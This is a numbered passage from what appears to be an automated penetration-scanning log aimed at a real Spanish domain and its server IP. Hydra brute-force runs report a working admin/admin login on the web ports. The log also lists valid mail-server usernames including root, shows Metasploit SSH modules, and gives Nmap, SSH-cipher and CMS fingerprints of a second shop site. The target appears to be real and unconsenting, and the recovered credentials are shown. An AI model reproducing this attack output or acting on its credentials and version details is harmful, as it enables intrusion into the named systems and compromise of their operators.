1893. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1894.  
1895. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:28
1896. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
1897. [DATA] attacking http-get://falange-autentica.es:80//
1898. [80][http-get] host: falange-autentica.es login: admin password: admin
1899. [STATUS] attack finished for falange-autentica.es (valid pair found)
1900. 1 of 1 target successfully completed, 1 valid password found
1901. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:50:52
1902. + -- --=[Port 110 closed... skipping.
1903. + -- --=[Port 139 closed... skipping.
1904. + -- --=[Port 162 closed... skipping.
1905. + -- --=[Port 389 opened... running tests...
1906. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1907.  
1908. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:52
1909. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1910.  
1911. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:52
1912. + -- --=[Port 443 opened... running tests...
1913. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1914.  
1915. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:52
1916. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
1917. [DATA] attacking http-gets://falange-autentica.es:443//
1918. [443][http-get] host: falange-autentica.es login: admin password: admin
1919. [STATUS] attack finished for falange-autentica.es (valid pair found)
1920. 1 of 1 target successfully completed, 1 valid password found
1921. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:51:07
1922. + -- --=[Port 445 closed... skipping.
1923. + -- --=[Port 512 closed... skipping.
1924. + -- --=[Port 513 closed... skipping.
1925. + -- --=[Port 514 closed... skipping.
1926. + -- --=[Port 993 opened... running tests...
1927. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1928.  
1929. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:51:07
1930. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
1931. [DATA] attacking imaps://falange-autentica.es:993/993
1932. [STATUS] 131.00 tries/min, 131 tries in 00:01h, 1402 to do in 00:11h, 1 active
1933. [STATUS] 133.33 tries/min, 400 tries in 00:03h, 1133 to do in 00:09h, 1 active
1934. [STATUS] 133.29 tries/min, 933 tries in 00:07h, 600 to do in 00:05h, 1 active
1935. 1 of 1 target completed, 0 valid passwords found
1936. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 18:02:37
1937. + -- --=[Port 1433 closed... skipping.
1938. + -- --=[Port 1521 closed... skipping.
1939. + -- --=[Port 3306 closed... skipping.
1940. + -- --=[Port 3389 closed... skipping.
1941. + -- --=[Port 5432 closed... skipping.
1942. + -- --=[Port 5900 closed... skipping.
1943. + -- --=[Port 5901 closed... skipping.
1944. + -- --=[Port 8000 closed... skipping.
1945. + -- --=[Port 8080 opened... running tests...
1946. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1947.  
1948. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 18:02:37
1949. + -- --=[Port 8100 closed... skipping.
1950. + -- --=[Port 6667 closed... skipping.
1951.  
1952. ################################### Done! ###########################################
1953.  
1954. * default
1955. * default
1956. [*] Importing 'Nmap XML' data
1957. [*] Import: Parsing with 'Nokogiri v1.8.5'
1958. [*] Importing host 91.121.2.184
1959. [*] Successfully imported /usr/share/sniper/loot/falange-autentica.es/nmap/nmap-falange-autentica.es.xml
1960. [*] Importing 'Nmap XML' data
1961. [*] Import: Parsing with 'Nokogiri v1.8.5'
1962. [*] Importing host 91.121.2.184
1963. [*] Successfully imported /usr/share/sniper/loot/falange-autentica.es/nmap/nmap-falange-autentica.es-udp.xml
1964. [*] Importing 'Nmap XML' data
1965. [*] Import: Parsing with 'Nokogiri v1.8.5'
1966. [*] Importing host 91.121.2.184
1967. [*] Successfully imported /usr/share/sniper/loot/falange-autentica.es/nmap/nmap-udp-falange-autentica.es.xml
1968.  
1969. Hosts
1970. =====
1971.  
1972. address mac name os_name os_flavor os_sp purpose info comments
1973. ------- --- ---- ------- --------- ----- ------- ---- --------
1974. 91.121.2.184 Linux 2.6.X server
1975. 195.55.47.89 Windows 3.X device
1976.  
1977. Services
1978. ========
1979.  
1980. host port proto name state info
1981. ---- ---- ----- ---- ----- ----
1982. 91.121.2.184 22 tcp ssh open OpenSSH 5.3 protocol 2.0
1983. 91.121.2.184 25 tcp smtp closed
1984. 91.121.2.184 53 udp domain unknown
1985. 91.121.2.184 67 udp dhcps unknown
1986. 91.121.2.184 68 udp dhcpc unknown
1987. 91.121.2.184 69 udp tftp unknown
1988. 91.121.2.184 80 tcp http open Apache httpd PHP 5.6.14
1989. 91.121.2.184 88 udp kerberos-sec unknown
1990. 91.121.2.184 123 udp ntp unknown
1991. 91.121.2.184 137 udp netbios-ns filtered
1992. 91.121.2.184 138 udp netbios-dgm filtered
1993. 91.121.2.184 139 tcp netbios-ssn closed
1994. 91.121.2.184 139 udp netbios-ssn unknown
1995. 91.121.2.184 161 udp snmp unknown
1996. 91.121.2.184 162 udp snmptrap unknown
1997. 91.121.2.184 389 tcp ldap open OpenLDAP 2.2.X - 2.3.X
1998. 91.121.2.184 389 udp ldap unknown
1999. 91.121.2.184 443 tcp ssl/ssl open Apache httpd SSL-only mode
2000. 91.121.2.184 445 tcp microsoft-ds closed
2001. 91.121.2.184 465 tcp ssl/smtps open
2002. 91.121.2.184 520 udp route unknown
2003. 91.121.2.184 993 tcp ssl/imaps open
2004. 91.121.2.184 2049 udp nfs unknown
2005. 91.121.2.184 7071 tcp ssl/iwg1 open
2006. 91.121.2.184 8080 tcp ssh open OpenSSH 5.3 protocol 2.0
2007. 195.55.47.89 25 tcp smtp closed
2008. 195.55.47.89 53 udp domain unknown
2009. 195.55.47.89 67 udp dhcps unknown
2010. 195.55.47.89 68 udp dhcpc unknown
2011. 195.55.47.89 69 udp tftp unknown
2012. 195.55.47.89 80 tcp http-proxy open Squid http proxy
2013. 195.55.47.89 88 udp kerberos-sec unknown
2014. 195.55.47.89 113 tcp ident closed
2015. 195.55.47.89 123 udp ntp unknown
2016. 195.55.47.89 137 udp netbios-ns filtered
2017. 195.55.47.89 138 udp netbios-dgm filtered
2018. 195.55.47.89 139 tcp netbios-ssn closed
2019. 195.55.47.89 139 udp netbios-ssn unknown
2020. 195.55.47.89 161 udp snmp unknown
2021. 195.55.47.89 162 udp snmptrap unknown
2022. 195.55.47.89 389 udp ldap unknown
2023. 195.55.47.89 443 tcp https open Microsoft-HTTPAPI/2.0
2024. 195.55.47.89 445 tcp microsoft-ds closed
2025. 195.55.47.89 520 udp route unknown
2026. 195.55.47.89 2049 udp nfs unknown
2027. #######################################################################################################################################
2028.  
2029. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:09 EST
2030. Nmap scan report for 91.121.2.184
2031. Host is up (0.11s latency).
2032. Not shown: 465 filtered ports, 3 closed ports
2033. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
2034. PORT STATE SERVICE
2035. 22/tcp open ssh
2036. 80/tcp open http
2037. 389/tcp open ldap
2038. 443/tcp open https
2039. 465/tcp open smtps
2040. 993/tcp open imaps
2041. 7071/tcp open iwg1
2042. 8080/tcp open http-proxy
2043. #######################################################################################################################################
2044. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:09 EST
2045. Nmap scan report for 91.121.2.184
2046. Host is up (0.12s latency).
2047. Not shown: 2 filtered ports
2048. PORT STATE SERVICE
2049. 53/udp open|filtered domain
2050. 67/udp open|filtered dhcps
2051. 68/udp open|filtered dhcpc
2052. 69/udp open|filtered tftp
2053. 88/udp open|filtered kerberos-sec
2054. 123/udp open|filtered ntp
2055. 139/udp open|filtered netbios-ssn
2056. 161/udp open|filtered snmp
2057. 162/udp open|filtered snmptrap
2058. 389/udp open|filtered ldap
2059. 520/udp open|filtered route
2060. 2049/udp open|filtered nfs
2061.  
2062. Nmap done: 1 IP address (1 host up) scanned in 18.65 seconds
2063. #######################################################################################################################################
2064. # general
2065. (gen) banner: SSH-2.0-OpenSSH_5.3
2066. (gen) software: OpenSSH 5.3
2067. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
2068. (gen) compression: enabled (zlib@openssh.com)
2069.  
2070. # key exchange algorithms
2071. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
2072. `- [info] available since OpenSSH 4.4
2073. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2074. `- [warn] using weak hashing algorithm
2075. `- [info] available since OpenSSH 2.3.0
2076. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
2077. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
2078. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2079. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
2080. `- [warn] using small 1024-bit modulus
2081. `- [warn] using weak hashing algorithm
2082. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
2083.  
2084. # host-key algorithms
2085. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
2086. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
2087. `- [warn] using small 1024-bit modulus
2088. `- [warn] using weak random number generator could reveal the key
2089. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2090.  
2091. # encryption algorithms (ciphers)
2092. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2093. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
2094. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2095. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2096. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2097. `- [warn] using weak cipher
2098. `- [info] available since OpenSSH 4.2
2099. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2100. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2101. `- [warn] using weak cipher
2102. `- [info] available since OpenSSH 4.2
2103. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2104. `- [warn] using weak cipher mode
2105. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
2106. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2107. `- [warn] using weak cipher
2108. `- [warn] using weak cipher mode
2109. `- [warn] using small 64-bit block size
2110. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
2111. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2112. `- [fail] disabled since Dropbear SSH 0.53
2113. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2114. `- [warn] using weak cipher mode
2115. `- [warn] using small 64-bit block size
2116. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
2117. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2118. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2119. `- [warn] using weak cipher mode
2120. `- [warn] using small 64-bit block size
2121. `- [info] available since OpenSSH 2.1.0
2122. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2123. `- [warn] using weak cipher mode
2124. `- [info] available since OpenSSH 2.3.0
2125. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2126. `- [warn] using weak cipher mode
2127. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
2128. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2129. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2130. `- [warn] using weak cipher
2131. `- [info] available since OpenSSH 2.1.0
2132. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2133. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2134. `- [warn] using weak cipher mode
2135. `- [info] available since OpenSSH 2.3.0
2136.  
2137. # message authentication code algorithms
2138. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2139. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2140. `- [warn] using encrypt-and-MAC mode
2141. `- [warn] using weak hashing algorithm
2142. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2143. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
2144. `- [warn] using weak hashing algorithm
2145. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2146. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
2147. `- [warn] using small 64-bit tag size
2148. `- [info] available since OpenSSH 4.7
2149. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
2150. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2151. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
2152. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2153. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2154. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2155. `- [warn] using encrypt-and-MAC mode
2156. `- [info] available since OpenSSH 2.5.0
2157. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2158. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2159. `- [warn] using encrypt-and-MAC mode
2160. `- [info] available since OpenSSH 2.1.0
2161. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2162. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2163. `- [warn] using encrypt-and-MAC mode
2164. `- [warn] using weak hashing algorithm
2165. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
2166. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2167. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2168. `- [warn] using encrypt-and-MAC mode
2169. `- [warn] using weak hashing algorithm
2170. `- [info] available since OpenSSH 2.5.0
2171.  
2172. # algorithm recommendations (for OpenSSH 5.3)
2173. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
2174. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
2175. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
2176. (rec) -ssh-dss -- key algorithm to remove
2177. (rec) -arcfour -- enc algorithm to remove
2178. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
2179. (rec) -blowfish-cbc -- enc algorithm to remove
2180. (rec) -3des-cbc -- enc algorithm to remove
2181. (rec) -aes256-cbc -- enc algorithm to remove
2182. (rec) -arcfour256 -- enc algorithm to remove
2183. (rec) -cast128-cbc -- enc algorithm to remove
2184. (rec) -aes192-cbc -- enc algorithm to remove
2185. (rec) -arcfour128 -- enc algorithm to remove
2186. (rec) -aes128-cbc -- enc algorithm to remove
2187. (rec) -hmac-md5-96 -- mac algorithm to remove
2188. (rec) -hmac-ripemd160 -- mac algorithm to remove
2189. (rec) -hmac-sha1-96 -- mac algorithm to remove
2190. (rec) -umac-64@openssh.com -- mac algorithm to remove
2191. (rec) -hmac-md5 -- mac algorithm to remove
2192. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
2193. (rec) -hmac-sha1 -- mac algorithm to remove
2194. #######################################################################################################################################
2195. ftp is a valid user!
2196. mail is a valid user!
2197. mysql is a valid user!
2198. nobody is a valid user!
2199. postfix is a valid user!
2200. root is a valid user!
2201. #######################################################################################################################################
2202.  
2203. libssh scanner 1.0.4
2204.  
2205. Searching for Vulnerable Hosts...
2206.  
2207. [*] 91.121.2.184:22 is not vulnerable to authentication bypass (SSH-2.0-OpenSSH_5.3)
2208.  
2209. Scanner Completed Successfully
2210. #######################################################################################################################################
2211. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:10 EST
2212. NSE: [ssh-run] Failed to specify credentials and command to run.
2213. Nmap scan report for 91.121.2.184
2214. Host is up (0.12s latency).
2215.  
2216. PORT STATE SERVICE VERSION
2217. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
2218. | ssh-auth-methods:
2219. | Supported authentication methods:
2220. | publickey
2221. | gssapi-keyex
2222. |_ gssapi-with-mic
2223. |_ssh-brute: Password authentication not allowed
2224. | ssh-hostkey:
2225. | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
2226. |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
2227. | ssh-publickey-acceptance:
2228. |_ Accepted Public Keys: No public keys accepted
2229. |_ssh-run: Failed to specify credentials and command to run.
2230. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2231. Aggressive OS guesses: Linux 2.6.32 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 2.6.32 - 3.1 (90%), Linux 3.11 (90%)
2232. No exact OS matches for host (test conditions non-ideal).
2233. Network Distance: 8 hops
2234.  
2235. TRACEROUTE (using port 22/tcp)
2236. HOP RTT ADDRESS
2237. 1 127.27 ms 10.251.200.1
2238. 2 127.56 ms 185.94.189.129
2239. 3 ...
2240. 4 138.51 ms 94.23.122.146
2241. 5 ...
2242. 6 137.53 ms 94.23.122.73
2243. 7 ...
2244. 8 137.39 ms 91.121.2.184
2245. #######################################################################################################################################
2246. USER_FILE => /brutex/wordlists/simple-users.txt
2247. RHOSTS => 91.121.2.184
2248. RHOST => 91.121.2.184
2249. [+] 91.121.2.184:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.3 service.protocol=ssh fingerprint_db=ssh.banner )
2250. [*] 91.121.2.184:22 - Scanned 1 of 1 hosts (100% complete)
2251. [*] Auxiliary module execution completed
2252. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
2253. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
2254. [+] 91.121.2.184:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.3 service.protocol=ssh fingerprint_db=ssh.banner )
2255. [*] 91.121.2.184:22 - Scanned 1 of 1 hosts (100% complete)
2256. #######################################################################################################################################
2257. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:11 EST
2258. Nmap scan report for 91.121.2.184
2259. Host is up (0.12s latency).
2260.  
2261. PORT STATE SERVICE VERSION
2262. 67/udp open|filtered dhcps
2263. |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
2264. Too many fingerprints match this host to give specific OS details
2265. Network Distance: 8 hops
2266.  
2267. TRACEROUTE (using proto 1/icmp)
2268. HOP RTT ADDRESS
2269. 1 106.53 ms 10.251.200.1
2270. 2 106.59 ms 185.94.189.129
2271. 3 ...
2272. 4 117.88 ms 94.23.122.146
2273. 5 ...
2274. 6 116.62 ms 91.121.131.219
2275. 7 ...
2276. 8 116.71 ms 91.121.2.184
2277. #######################################################################################################################################
2278. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:14 EST
2279. Nmap scan report for 91.121.2.184
2280. Host is up (0.11s latency).
2281.  
2282. PORT STATE SERVICE VERSION
2283. 68/udp open|filtered dhcpc
2284. Too many fingerprints match this host to give specific OS details
2285. Network Distance: 8 hops
2286.  
2287. TRACEROUTE (using proto 1/icmp)
2288. HOP RTT ADDRESS
2289. 1 105.06 ms 10.251.200.1
2290. 2 117.37 ms 185.94.189.129
2291. 3 ...
2292. 4 116.58 ms 94.23.122.146
2293. 5 ...
2294. 6 115.16 ms 91.121.131.219
2295. 7 ...
2296. 8 115.21 ms 91.121.2.184
2297. #######################################################################################################################################
2298. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:16 EST
2299. Nmap scan report for 91.121.2.184
2300. Host is up (0.11s latency).
2301.  
2302. PORT STATE SERVICE VERSION
2303. 69/udp open|filtered tftp
2304. Too many fingerprints match this host to give specific OS details
2305. Network Distance: 8 hops
2306.  
2307. TRACEROUTE (using proto 1/icmp)
2308. HOP RTT ADDRESS
2309. 1 104.27 ms 10.251.200.1
2310. 2 104.33 ms 185.94.189.129
2311. 3 ...
2312. 4 116.06 ms 94.23.122.146
2313. 5 ...
2314. 6 114.70 ms 91.121.131.219
2315. 7 ...
2316. 8 114.69 ms 91.121.2.184
2317. #######################################################################################################################################
2318.  
2319. ^ ^
2320. _ __ _ ____ _ __ _ _ ____
2321. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
2322. | V V // o // _/ | V V // 0 // 0 // _/
2323. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
2324. <
2325. ...'
2326.  
2327. WAFW00F - Web Application Firewall Detection Tool
2328.  
2329. By Sandro Gauci && Wendel G. Henrique
2330.  
2331. Checking http://91.121.2.184
2332. Generic Detection results:
2333. No WAF detected by the generic detection
2334. Number of requests: 14
2335. #######################################################################################################################################
2336. http://91.121.2.184 [302 Found] Country[FRANCE][FR], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[http://azulmania.es/], X-Powered-By[PHP/5.6.14]
2337. http://azulmania.es/ [301 Moved Permanently] Country[FRANCE][FR], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[https://azulmania.es/], X-Powered-By[PHP/5.6.14]
2338. https://azulmania.es/ [302 Found] Apache, Country[FRANCE][FR], HTTPServer[Apache], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[https://azulmania.es/es/], X-Powered-By[PHP/5.6.14]
2339. https://azulmania.es/es/ [200 OK] Apache, Cookies[PrestaShop-d617857eb8adf9da2917508ed07468ca], Country[FRANCE][FR], Google-Analytics[Universal][UA-31263279-1], HTML5, HTTPServer[Apache], HttpOnly[PrestaShop-d617857eb8adf9da2917508ed07468ca], IP[91.121.2.184], MetaGenerator[PrestaShop], PHP[5.6.14], PrestaShop, Script[text/javascript], Title[Azulmanía - Azulmanía], UncommonHeaders[powered-by], X-Powered-By[PHP/5.6.14]
2340. ######################################################################################################################################
2341. wig - WebApp Information Gatherer
2342.  
2343.  
2344. Scanning https://azulmania.es...
2345. _____________________ SITE INFO _____________________
2346. IP Title
2347. 91.121.2.184 Azulmanía - Azulmanía
2348.  
2349. ______________________ VERSION ______________________
2350. Name Versions Type
2351. PrestaShop 1.6.1.1 CMS
2352. Apache Platform
2353. PHP 5.6.14 Platform
2354. openSUSE tumbleweed OS
2355.  
2356. ____________________ INTERESTING ____________________
2357. URL Note Type
2358. /robots.txt robots.txt index Interesting
2359.  
2360. _____________________________________________________
2361. Time: 48.8 sec Urls: 224 Fingerprints: 40401
2362. #######################################################################################################################################
2363. HTTP/1.1 302 Found
2364. Date: Wed, 07 Nov 2018 22:20:25 GMT
2365. X-Powered-By: PHP/5.6.14
2366. Location: http://azulmania.es/
2367. Vary: Accept-Encoding
2368. Content-Encoding: gzip
2369. Content-Length: 20
2370. Content-Type: text/html; charset=utf-8
2371. X-Pad: avoid browser bug
2372. Connection: keep-alive
2373. #######################################################################################################################################
2374. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:20 EST
2375. Nmap scan report for 91.121.2.184
2376. Host is up (0.11s latency).
2377.  
2378. PORT STATE SERVICE VERSION
2379. 123/udp open|filtered ntp
2380. Too many fingerprints match this host to give specific OS details
2381. Network Distance: 8 hops
2382.  
2383. TRACEROUTE (using proto 1/icmp)
2384. HOP RTT ADDRESS
2385. 1 106.48 ms 10.251.200.1
2386. 2 106.51 ms 185.94.189.129
2387. 3 ...
2388. 4 117.78 ms 94.23.122.146
2389. 5 ...
2390. 6 116.75 ms 91.121.131.219
2391. 7 ...
2392. 8 116.52 ms 91.121.2.184
2393. #######################################################################################################################################
2394. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:23 EST
2395. Nmap scan report for 91.121.2.184
2396. Host is up (0.11s latency).
2397.  
2398. PORT STATE SERVICE VERSION
2399. 161/tcp filtered snmp
2400. 161/udp open|filtered snmp
2401. Too many fingerprints match this host to give specific OS details
2402. Network Distance: 8 hops
2403.  
2404. TRACEROUTE (using proto 1/icmp)
2405. HOP RTT ADDRESS
2406. 1 108.83 ms 10.251.200.1
2407. 2 190.00 ms 185.94.189.129
2408. 3 ...
2409. 4 119.80 ms 94.23.122.146
2410. 5 ...
2411. 6 113.27 ms 91.121.131.219
2412. 7 ...
2413. 8 113.18 ms 91.121.2.184
2414. #######################################################################################################################################
2415. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:25 EST
2416. Nmap scan report for 91.121.2.184
2417. Host is up (0.11s latency).
2418.  
2419. PORT STATE SERVICE VERSION
2420. 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
2421. | ldap-rootdse:
2422. | LDAP Results
2423. | <ROOT>
2424. | namingContexts:
2425. | supportedControl: 1.3.6.1.4.1.4203.666.5.18
2426. | supportedControl: 1.3.6.1.4.1.4203.1.9.1.1
2427. | supportedControl: 1.3.6.1.4.1.21008.108.63.1
2428. | supportedControl: 2.16.840.1.113730.3.4.18
2429. | supportedControl: 2.16.840.1.113730.3.4.2
2430. | supportedControl: 1.3.6.1.4.1.4203.666.5.12
2431. | supportedControl: 1.3.6.1.4.1.4203.666.5.2
2432. | supportedControl: 1.3.6.1.4.1.4203.1.10.1
2433. | supportedControl: 1.2.840.113556.1.4.1340
2434. | supportedControl: 1.2.840.113556.1.4.805
2435. | supportedControl: 1.2.840.113556.1.4.1413
2436. | supportedControl: 1.3.6.1.4.1.4203.666.5.15
2437. | supportedControl: 1.2.840.113556.1.4.1339
2438. | supportedControl: 1.2.840.113556.1.4.319
2439. | supportedControl: 1.2.826.0.1.3344810.2.3
2440. | supportedControl: 1.3.6.1.1.13.2
2441. | supportedControl: 1.3.6.1.1.13.1
2442. | supportedControl: 1.3.6.1.1.12
2443. | supportedExtension: 1.3.6.1.4.1.1466.20037
2444. | supportedExtension: 1.3.6.1.4.1.4203.1.11.1
2445. | supportedExtension: 1.3.6.1.4.1.4203.1.11.3
2446. | supportedExtension: 1.3.6.1.1.8
2447. | supportedLDAPVersion: 3
2448. | supportedSASLMechanisms: SCRAM-SHA-1
2449. | supportedSASLMechanisms: GSSAPI
2450. | supportedSASLMechanisms: DIGEST-MD5
2451. | supportedSASLMechanisms: OTP
2452. | supportedSASLMechanisms: CRAM-MD5
2453. |_ subschemaSubentry: cn=Subschema
2454. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2455. Aggressive OS guesses: Linux 2.6.32 (92%), Linux 2.6.32 - 3.1 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 3.11 (90%)
2456. No exact OS matches for host (test conditions non-ideal).
2457. Network Distance: 8 hops
2458.  
2459. TRACEROUTE (using port 389/tcp)
2460. HOP RTT ADDRESS
2461. 1 103.68 ms 10.251.200.1
2462. 2 103.91 ms 185.94.189.129
2463. 3 ...
2464. 4 115.06 ms 94.23.122.146
2465. 5 ...
2466. 6 114.01 ms 91.121.131.219
2467. 7 ...
2468. 8 113.99 ms 91.121.2.184
2469. #######################################################################################################################################
2470. ^ ^
2471. _ __ _ ____ _ __ _ _ ____
2472. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
2473. | V V // o // _/ | V V // 0 // 0 // _/
2474. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
2475. <
2476. ...'
2477.  
2478. WAFW00F - Web Application Firewall Detection Tool
2479.  
2480. By Sandro Gauci && Wendel G. Henrique
2481.  
2482. Checking https://91.121.2.184
2483. The site https://91.121.2.184 is behind a Imperva SecureSphere
2484. Number of requests: 9
2485. #######################################################################################################################################
2486. https://91.121.2.184 [302 Found] Apache, Country[FRANCE][FR], HTTPServer[Apache], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[http://azulmania.es/], X-Powered-By[PHP/5.6.14]
2487. http://azulmania.es/ [301 Moved Permanently] Country[FRANCE][FR], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[https://azulmania.es/], X-Powered-By[PHP/5.6.14]
2488. https://azulmania.es/ [302 Found] Apache, Country[FRANCE][FR], HTTPServer[Apache], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[https://azulmania.es/es/], X-Powered-By[PHP/5.6.14]
